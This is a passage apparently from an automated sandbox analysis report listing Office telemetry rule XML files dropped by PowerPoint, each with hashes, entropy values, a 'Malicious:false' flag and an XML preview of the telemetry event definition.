                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100074" V="0" DC="SM" EN="Office.UX.WhatsNewItemHyperlinkClick" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bbqsp" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="W" I="1" O="true" N="FeatureTag">.. <S T="1" F="FeatureTag" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):586
                                                                                                                              Entropy (8bit):5.184710233838763
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd/ndkTun8DWyZcAAwEerY3tOpv0t/G5yp7s/ZByNO2su:2d/dsvDb0wLrYUlcsBi
                                                                                                                              MD5:6E76DCB19FB44EA1E65014E0CE218AB0
                                                                                                                              SHA1:0313ABCCB6532B8749626F7BCB03ED0D730B8B6F
                                                                                                                              SHA-256:735879C44400699786304B87916667E37F35A3B26331C41B2366FEA88033B070
                                                                                                                              SHA-512:967A39E02654A0C6996C6DD9699C37E79007A8EFB7D315EBE23E77E5298A14B3AE80D8322C41FFFDE714CD0EA50F256A8C65A242450C163CAF5C70AF6E72C871
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100075" V="1" DC="SM" EN="Office.UX.TeachingCallout.TeachingCalloutShown" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bfhe2" />.. </S>.. <C T="W" I="0" O="false" N="TeachingCalloutId">.. <S T="1" F="TeachingCalloutId" />.. </C>.. <C T="U32" I="1" O="false" N="PreRegKeyVal">.. <S T="1" F="PreRegKeyVal" />.. </C>.. <C T="U32" I="2" O="false" N="PostRegKeyVal">.. <S T="1" F="PostRegKeyVal" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):729
                                                                                                                              Entropy (8bit):5.049181212012891
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd7dkVeun8DWyZcAAwEerN3tOpvdmARdyEXqdUNIdnHD9rgL0NO2su:2dxhvDb0wLrNUD/IDR1
                                                                                                                              MD5:A1C32A2040850EEC0D8769D73B81F8B3
                                                                                                                              SHA1:6309C8B096063BA83039390BE9391E7FE6A91A29
                                                                                                                              SHA-256:8EBC17CB904B635F64A26B18D6C3BBB95BBA210C348D386F15A0C302B752A478
                                                                                                                              SHA-512:973A85A11BEC72BDC6A5E8FC50EABFA56CA04B6E659AA14854BD80ADF2DC98EB63BF1D4349979C44A32D81A42981327DD994C242EE4AEDDE96A68EDD0784D72B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100076" V="2" DC="SM" EN="Office.UX.TeachingCallout.TeachingCalloutHidden" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="4qnub" />.. </S>.. <C T="W" I="0" O="false" N="TeachingCalloutId">.. <S T="1" F="TeachingCalloutId" />.. </C>.. <C T="W" I="1" O="false" N="AnchorId">.. <S T="1" F="AnchorId" />.. </C>.. <C T="W" I="2" O="false" N="Title">.. <S T="1" F="Title" />.. </C>.. <C T="W" I="3" O="false" N="Info">.. <S T="1" F="Info" />.. </C>.. <C T="B" I="4" O="false" N="CalloutAlwaysShow">.. <S T="1" F="CalloutAlwaysShow" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):586
                                                                                                                              Entropy (8bit):5.158726096353292
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdLF6dkRoun8DWyZcAAwEerm3tOpvvfEFxppvFNvxNO2su:2dLCxvDb0wLrmU1QVvFR3
                                                                                                                              MD5:2BA258B06C54DF790012A5098D0DB9F0
                                                                                                                              SHA1:66AC50733B3D79D421AA3453C580B864830D8682
                                                                                                                              SHA-256:BB448A91F4A1AAEE49D517B15512555AE43508FE3471708EDC8B1549575E4A30
                                                                                                                              SHA-512:E31DD4A8FE41BD1431CAC663B0206F1517F84647DF0B0914E6EAD5CDC94367A6423C42B454F7FA11B4235ECE4C3F9A0796718916139C9EC332839486F7D4E11B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100077" V="2" DC="SM" EN="Office.UX.TeachingCallout.TeachingCalloutButtonClick" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="4qnua" />.. </S>.. <C T="W" I="0" O="false" N="TeachingCalloutId">.. <S T="1" F="TeachingCalloutId" />.. </C>.. <C T="U32" I="1" O="false" N="ButtonType">.. <S T="1" F="ButtonType" />.. </C>.. <C T="U32" I="2" O="false" N="TotalButtons">.. <S T="1" F="TotalButtons" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):413
                                                                                                                              Entropy (8bit):5.287984558638439
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdQdkV0un8DWyZcAAwEerEA3tOpvNO2su:2dWzvDb0wLrPU/
                                                                                                                              MD5:F1CE09999B4B350E954C449DCD687080
                                                                                                                              SHA1:2DE21A2FFB189374B50FAFC28E524018874AE0B2
                                                                                                                              SHA-256:D708E23A5A1B7EEF562C29674913688C4C09F3BA6917988202F54A9B68EAD43E
                                                                                                                              SHA-512:9F17CD24C78E0FE9B5609B841DCE49EF7BB899859D1F1D26FF50E1601EA8A9AE74E933313132FEB229594570DAAF581A2557D87674BAC928D01F1000F5B9EE3B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100078" V="1" DC="SM" EN="Office.UX.TeachingCallout.TeachingCalloutHyperlinkClick" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bfhe5" />.. </S>.. <C T="W" I="0" O="false" N="TeachingCalloutId">.. <S T="1" F="TeachingCalloutId" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):412
                                                                                                                              Entropy (8bit):5.267817827165894
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdCdkJEk3dun8DWyZcAAwEer43tOpvNO2su:2dQQEk3dvDb0wLr4U/
                                                                                                                              MD5:3482F3A1659236D2232BA10912EF5CC6
                                                                                                                              SHA1:0C7CD5F8BBF3996C825E099148A6AC934D87C7F0
                                                                                                                              SHA-256:795F2F9F2683236ABE758C54944FCC1529B13DFA2F9CBC8FDFD5A6BE7B418922
                                                                                                                              SHA-512:4198CE6BEFBC9C2955A50B25C34F972E5FCB4F4E464FD4331E00E8B300670BD760F7E22091211BEAC280A0778BD4E77059B9F75BEA4C72BF931D4EE334A5790F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100079" V="2" DC="SM" EN="Office.UX.TeachingCallout.TeachingCalloutTappedOutside" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="4qnt8" />.. </S>.. <C T="W" I="0" O="false" N="TeachingCalloutId">.. <S T="1" F="TeachingCalloutId" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):681
                                                                                                                              Entropy (8bit):5.231377942579125
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdYZHsHoun8DWyZcAAwEersJV4ciFIqtcifn+0H/Iqttdy9oEINO2su:2dYZGovDb0wLrs8cixcitHTvYg
                                                                                                                              MD5:7B5BAC8525989E8899C3679731D98258
                                                                                                                              SHA1:C0803639CEFF57C7066B8ED1C67EB50B00349403
                                                                                                                              SHA-256:9A3292D9D11EE8CB27677F193ABE095831F9B7E4174D9E652F82803D328E5DE9
                                                                                                                              SHA-512:91D981040EA5E09BE70950240F8867229617D00092D1E66D537313AF74EA1DF765BDE195C2626B965B75E67BF8C454E2738ADE3E34FB44BA8D9B3068CBF78B13
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100083" V="2" DC="SM" EN="Office.UX.HighContrastAccessibilitySystemSettingsWin32" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bhktg" A="bgkti" />.. </S>.. <C T="B" I="0" O="true" N="IsHighContrastFeatureAvailable">.. <S T="1" F="IsHighContrastFeatureAvailable" M="Ignore" />.. </C>.. <C T="B" I="1" O="true" N="IsHighContrastOn">.. <S T="1" F="IsHighContrastFeatureOn" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="HighContrastScheme">.. <S T="1" F="HighContrastScheme" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):403
                                                                                                                              Entropy (8bit):5.261641260441923
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdN0Iun8DWyZcAAwEerwJVOI3ZaNO2su:2dzvDb0wLryZa
                                                                                                                              MD5:3671EA9C5CBDE113F64D8C3561349D0F
                                                                                                                              SHA1:34A9746232B7AD0A407774E6EC07ED97E3A295C2
                                                                                                                              SHA-256:7D7B07D4C42A86C7C69E9FDE8460DA77F21D6B82F7A65F183D859BBE9F76D674
                                                                                                                              SHA-512:7676A3F992C4A0FB1060D6EA5FDD2D352D74713B2EEDF42AF7D88BC96BD48EFA7DC56390F6952DB4C2ADE843F05B7051EFA2F9F37E52008EDA6CA85C49BCD22A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100084" V="1" DC="SM" EN="Office.UX.AnimationSystemSettings" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bhkth" />.. </S>.. <C T="B" I="0" O="true" N="IsAnimationEnabled">.. <S T="1" F="IsAnimationEnabled" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):421
                                                                                                                              Entropy (8bit):5.2961268242072945
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdG8un8DWyZcAApAQierLYsldUqNO2su:2dG8vDb0/rUqaq
                                                                                                                              MD5:A6451ECAB2CD42E85B452E2BF1A1158C
                                                                                                                              SHA1:A04D2EA4080781702374E87591381B8F54051D4D
                                                                                                                              SHA-256:73FDDEB1B6C49CA452AE79D8975D99891A5CC1B2FA319F933081A7AD82E71955
                                                                                                                              SHA-512:D2631BFDBE43A130052E1436189445246C90AF7DEFC9C6E4031615B9F58F59D9519E11CDD3C6918D0770BD36F9C7958724D21255A5DAB75A5C6E2D4FAB95374A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100085" V="0" DC="SM" EN="Office.UX.AccChecker" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="be7sb" />.. </S>.. <C T="W" I="0" O="true" N="ShowingAccessibilityChecker">.. <S T="1" F="UxAccChecker" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):457
                                                                                                                              Entropy (8bit):5.193779288742389
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdUW0Tun8DWyZcAAwEer++WuF2yab9zNO2su:2dUW0TvDb0wLrDWQ25
                                                                                                                              MD5:0577879C523FD7CB65C2D80E7A663F27
                                                                                                                              SHA1:7A4863B6468521FC3AFF8331024A7537079A2035
                                                                                                                              SHA-256:7A9EAB976443BEB6F59CBD4F9B572BE0C7521771F3D871C0E4D6F53EB4DBAAC3
                                                                                                                              SHA-512:F4D4156DEF78C290FF6C0009C8DA02AB975B551C633FFC46156E0935D6E02D250F67DCDFFBC4A3DCBB7DEEF7722AD005CFB0BBA3540130CA5A97634D1DEC7564
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100094" V="0" DC="SM" EN="Office.UX.Dialogs.SDM.DoModal" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cnyur" />.. </S>.. <C T="I32" I="0" O="false" N="HelpId">.. <S T="1" F="DialogId_hid" />.. </C>.. <C T="U32" I="1" O="true" N="ReturnTmc">.. <S T="1" F="Return_tmc" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1594
                                                                                                                              Entropy (8bit):4.552983510334679
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d0NWlw0/53bTwGuNn/hFF4j68OWxue+Iz:c8L0h3bUGuZjF4Bp7z
                                                                                                                              MD5:35A756BB6CA3F8BDDC97342284174200
                                                                                                                              SHA1:22F2158D40D9B17C665A965FE8721D45A352856A
                                                                                                                              SHA-256:8C638B3BF14BACA701C62344E8F41568D031BF006A440F0C92039D3685D13096
                                                                                                                              SHA-512:E31A85134F96F2AB82FA9B9B89BBFBA9EAF15035A397EDA4630D6F42A2859FBED98A112AE4560054D571F836C12C17024821926659AFDABD0C588557D99BEE50
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU" xmlns="">.. <S>.. <Etw T="1" E="159" G="{02fd33df-f746-4a10-93a0-2bc6273bc8e4}" />.. <F T="2">.. <O T="AND">.. <L>.. <O T="NE">.. <L>.. <S T="1" F="Warning" />.. </L>.. <R>.. <V V="37" T="U32" />.. </R>.. </O>.. </L>.. <R>.. <O T="NE">.. <L>.. <S T="1" F="Warning" />.. </L>.. <R>.. <V V="29" T="U32" />.. </R>.. </O>.. </R>.. </O>.. </F>.. <TI T="3" I="10min" />.. <A T="4" E="TelemetrySuspend" />.. <A T="5" E="TelemetryShutdown" />.. </S>.. <G I="true" R="TriggerOldest">.. <S T="2">.. <F N="RuleID" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):950
                                                                                                                              Entropy (8bit):5.13263189574204
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dxlKvDb0wGorplx2Lx2divhC152lU00I:cxIRlasomo/0I
                                                                                                                              MD5:11B08F2379BDB049177FAE40A8411612
                                                                                                                              SHA1:42689E356E86F48979F3A338F9ACA5C92CC5A911
                                                                                                                              SHA-256:70BF709198724DA28FC0AFD3B4DB93F514586ACDD769837B367563FAE256DB1E
                                                                                                                              SHA-512:A4584D522DF9196CE0401A593FA284DF21DC9C5D9D7765AF989838AAFB26EB5DCEE3FDA2D3A3AE535C2E7627B24EB6201CF4A78D8298F4E49CD6D33A81B42B21
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100104" V="2" DC="SM" EN="Office.UX.Desktop.SmartContextMenu" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="cplfq" />.. </S>.. <C T="G" I="0" O="false" N="ContextMenuSessionId">.. <S T="1" F="ContextMenuSessionId" />.. </C>.. <C T="U64" I="1" O="false" N="TimeTakenBySuggestionProvider">.. <S T="1" F="TimeTakenBySuggestionProvider" />.. </C>.. <C T="U64" I="2" O="true" N="ContextMenuTcid">.. <S T="1" F="ContextMenuTcid" />.. </C>.. <C T="W" I="3" O="true" N="Information">.. <S T="1" F="Information" />.. </C>.. <C T="U32" I="4" O="false" N="UserActionID">.. <V V="0" T="U32" />.. </C>.. <C T="W" I="5" O="false" N="UserActionName">.. <V V="SmartContextMenu_SessionInfo" T="W" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):841
                                                                                                                              Entropy (8bit):5.1130725494870894
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdYislFun8DWyZcAAwHmdertHwr28KCQmFrnytg/84ADFNyFkd+DO2klU3gNOQ:2dclFvDb0wGoryoK3kLD+8lU3I
                                                                                                                              MD5:9991F4C1B6E9408129E4545E3E0C5094
                                                                                                                              SHA1:D57948CEFBEDF08FBA780948F3D8BA208DB1AF76
                                                                                                                              SHA-256:BF1A2025122E71688D123BECAA5B58C35A36DA5FB321F3FECF4D58153975B399
                                                                                                                              SHA-512:502B5BF8FF233D15E8081ED99811AC1F5F3F6F63C8283E5D7FEF5C94571388B69979800F65EF2E0C90383B4D6A594D990EDF1CDEAB12393FEBCBC8FE90E00A20
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100105" V="0" DC="SM" EN="Office.UX.Desktop.SmartContextMenuItem" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="ctgzk" />.. </S>.. <C T="G" I="0" O="false" N="ContextMenuSessionId">.. <S T="1" F="ContextMenuSessionId" />.. </C>.. <C T="I32" I="1" O="false" N="SuggestedTcid">.. <S T="1" F="Tcid" />.. </C>.. <C T="I32" I="2" O="false" N="CommandPosition">.. <S T="1" F="Position of suggested tcid" />.. </C>.. <C T="U32" I="3" O="false" N="UserActionID">.. <V V="0" T="U32" />.. </C>.. <C T="W" I="4" O="false" N="UserActionName">.. <V V="SmartContextMenu_MenuItemInfo" T="W" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1045
                                                                                                                              Entropy (8bit):5.1005145953903295
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdY1qgkIun8DWyZcAAwHmderm828KR/utxfHxlF82yp1DEfE5kyjkdKO2klU5k:2dvIvDb0wGorwY/Fk1I85kpKIlU5LI
                                                                                                                              MD5:F06A86C81121B490ECBCD2104D19C599
                                                                                                                              SHA1:F18D7727120EBA5FCFE8536E3FE34E68A2620D61
                                                                                                                              SHA-256:7D72509EBFEFA8422109C6EED61991763C6D9A2E3BC2BDBDA2D8D2FC741A5094
                                                                                                                              SHA-512:32B47E5796409DBCC70360311D0752B562F4D8DB657464E6FB39DD134CD31B326F9B2378476077E997EF53B0C707A86A365AA1945A24B097F0BBCB182F865026
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100106" V="0" DC="SM" EN="Office.UX.Desktop.ContextMenuItemClick" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="ctgys" />.. </S>.. <C T="G" I="0" O="false" N="ContextMenuSessionId">.. <S T="1" F="ContextMenuSessionId" />.. </C>.. <C T="I32" I="1" O="false" N="CommandPosition">.. <S T="1" F="CommandPosition" />.. </C>.. <C T="I32" I="2" O="false" N="CommandType">.. <S T="1" F="Command Type" />.. </C>.. <C T="I32" I="3" O="false" N="ResultBindingTcid">.. <S T="1" F="ResultBindingTcid" />.. </C>.. <C T="I32" I="4" O="false" N="ExecutedControlTcid">.. <S T="1" F="ExecutedControlTcid" />.. </C>.. <C T="U32" I="5" O="false" N="UserActionID">.. <V V="0" T="U32" />.. </C>.. <C T="W" I="6" O="false" N="UserActionName">.. <V V="SmartContextMenu_MenuItemClickInfo" T="W" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):545
                                                                                                                              Entropy (8bit):5.118071593489877
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdYNxun8DWyZcAAwEerJ7sWtlZXaWtvMfZvwxdy96JfMyxNO2su:2dwxvDb0wLrhdM5wrR0y3
                                                                                                                              MD5:9AA744D5B6B17CD62043AF4E53E7B38F
                                                                                                                              SHA1:D8DBC753961C8404F8D873278E7AB53238C683A7
                                                                                                                              SHA-256:2586C46FF798CBCAC590A3506190AA94DE2A483B31EA20BADABFBED1CFE74AC0
                                                                                                                              SHA-512:D5CD6D35E45B8C3F826762D3AD183E17FFEBDF1E88CE9541D668B14A466184F0E127F67EEF548D821B690675872EF31E67A7203CE38FE77B72790C6EA88E6718
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100109" V="1" DC="SM" EN="Office.UX.HostedSurveyShowed" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cmgze" />.. </S>.. <C T="W" I="0" O="true" N="SurveyId">.. <S T="1" F="SurveyId" />.. </C>.. <C T="U32" I="1" O="true" N="SurveyType">.. <S T="1" F="SurveyType" />.. </C>.. <C T="W" I="2" O="true" N="ManifestSubType">.. <S T="1" F="ManifestSubType" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):460
                                                                                                                              Entropy (8bit):5.1674364373796875
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5d20QTun8DWyZcAAwEer+sWtlZXaWtvMfZvwxNO2su:2d5d20QTvDb0wLr+dM5w3
                                                                                                                              MD5:BE4F266143658422F4649C9A2CCF6B60
                                                                                                                              SHA1:FDBC871B6F3403285D9CB928AA42694C645792A3
                                                                                                                              SHA-256:777A02FD054568BBA52B024BC36BB0F9428F5912D1A77F3C0A1AE9BB38305613
                                                                                                                              SHA-512:787D7A32BC01B4081BECB4E2EFAFFCD7DE4F6123620D9707FCCADB7E058ABD40FC15792AAB5EF65BECC8BEF43CBF9469DA22313AFB39656464B44B6BFB3F26E1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100110" V="1" DC="SM" EN="Office.UX.UpgradeOfficeButtonClicked" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="c7xsl" />.. </S>.. <C T="W" I="0" O="true" N="SurveyId">.. <S T="1" F="SurveyId" />.. </C>.. <C T="U32" I="1" O="true" N="SurveyType">.. <S T="1" F="SurveyType" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):459
                                                                                                                              Entropy (8bit):4.601167606059205
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7cD4HperhrJ8d+/OCxnJUq+/ClynMJ/IiiLynJo/AYlMNOn2sby:TMHd+OerXauHIPMxIiOySAYlMNO2su
                                                                                                                              MD5:6201A98CF28A9BF09BC0F990BA91315E
                                                                                                                              SHA1:D77EB7278303D8B994963EE16A148F7A09B797E8
                                                                                                                              SHA-256:4BF17D1E6FBB694AE1A72662FA603D5FF800777A5C67B8B3F61BF4DB08ACD6FD
                                                                                                                              SHA-512:A3222E5D21A25B75F82167A962734D54F0FCAD7C20E166DB51B9A1E530142FCFFDB0244F7C6A1F5386AF507C27A807DD04357C14E9012C2F35045B95799C4277
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100113" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="8ylld" />.. </S>.. <C T="W" I="0" O="false">.. <V V="Create" T="W" />.. </C>.. <C T="U32" I="1" O="false">.. <S T="1" F="Context" />.. </C>.. <C T="U64" I="2" O="false">.. <S T="1" F="Instance" />.. </C>.. <C T="U32" I="3" O="false">.. <S T="1" F="AuthorCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):460
                                                                                                                              Entropy (8bit):4.619601498995438
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7cJY4HperhrJfd+/OKxnJUq+/ClynMJ/IiiLynJo/AYlMNOn2sby:TMHdIYOerXFuxIPMxIiOySAYlMNO2su
                                                                                                                              MD5:1D159ECCD60526562438C851790B79BC
                                                                                                                              SHA1:605AF7647932859F05E3E9CE807EE9C338133291
                                                                                                                              SHA-256:63898062B4B1090C876A235428DB8D60D8C1339AE71D248228C7F46B98FAA26A
                                                                                                                              SHA-512:F9BD908AD0A7A7EBCBD7BDC01C418F19B04DFEBE10D243748F010F2D378F7347EEB254ED11E36F1590290ED2D968375F3393C0F30DE4FEF76DBEDE3D9C2A0AC8
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100114" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="8yllc" />.. </S>.. <C T="W" I="0" O="false">.. <V V="Destroy" T="W" />.. </C>.. <C T="U32" I="1" O="false">.. <S T="1" F="Context" />.. </C>.. <C T="U64" I="2" O="false">.. <S T="1" F="Instance" />.. </C>.. <C T="U32" I="3" O="false">.. <S T="1" F="AuthorCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):459
